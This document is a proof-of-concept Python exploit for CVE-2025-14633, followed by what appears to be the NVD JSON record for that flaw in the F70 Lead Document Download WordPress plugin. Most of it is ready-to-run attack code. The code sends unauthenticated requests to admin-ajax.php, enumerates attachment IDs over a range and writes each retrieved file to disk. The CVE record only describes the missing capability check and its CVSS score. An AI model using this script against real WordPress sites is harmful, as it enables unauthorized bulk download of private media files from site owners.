CVE-2025-14633

import requests # CVE-2025-14633 PoC - Unauthenticated File Download # Target: WordPress site with F70 Lead Document Download plugin <= 1.4.4 def exploit_cve_2025_14633(target_url, attachment_id): """ Exploit for IDOR vulnerability in F70 Lead Document Download plugin Allows unauthenticated download of arbitrary WordPress media files Args: target_url: Base URL of the WordPress site attachment_id: WordPress attachment ID to download Returns: Response content if successful, None otherwise """ # Construct the vulnerable endpoint exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request with action parameter data = { 'action': 'f70_lead_document_download', 'attachment_id': attachment_id } # Send the request without authentication try: response = requests.post(exploit_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Successfully downloaded attachment ID: {attachment_id}") print(f"[+] Content length: {len(response.content)} bytes") return response.content else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None def enumerate_attachments(target_url, start_id=1, end_id=1000): """ Enumerate WordPress attachment IDs to find accessible files """ print(f"[*] Starting enumeration from ID {start_id} to {end_id}") for attachment_id in range(start_id, end_id + 1): content = exploit_cve_2025_14633(target_url, attachment_id) if content and len(content) > 0: print(f"[+] Found valid attachment at ID: {attachment_id}") # Save to file filename = f"attachment_{attachment_id}.bin" with open(filename, 'wb') as f: f.write(content) print(f"[+] Saved to: {filename}") # Example usage if __name__ == "__main__": target = "https://example.com" # Download specific attachment # exploit_cve_2025_14633(target, 123) # Or enumerate to find valid attachments # enumerate_attachments(target, 1, 100)

{"cve": {"id": "CVE-2025-14633", "sourceIdentifier": "[email protected]", "published": "2025-12-20T04:16:08.140", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The F70 Lead Document Download plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'file_download' function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to download any file from the WordPress media library by guessing or enumerating WordPress attachment IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/f70-lead-document-download/tags/1.4.4/includes/class.download.php#L61", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/f70-lead-document-download/trunk/includes/class.download.php#L61", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bba22270-de9b-4651-8180-c077ef113112?source=cve", "source": "[email protected]"}]}}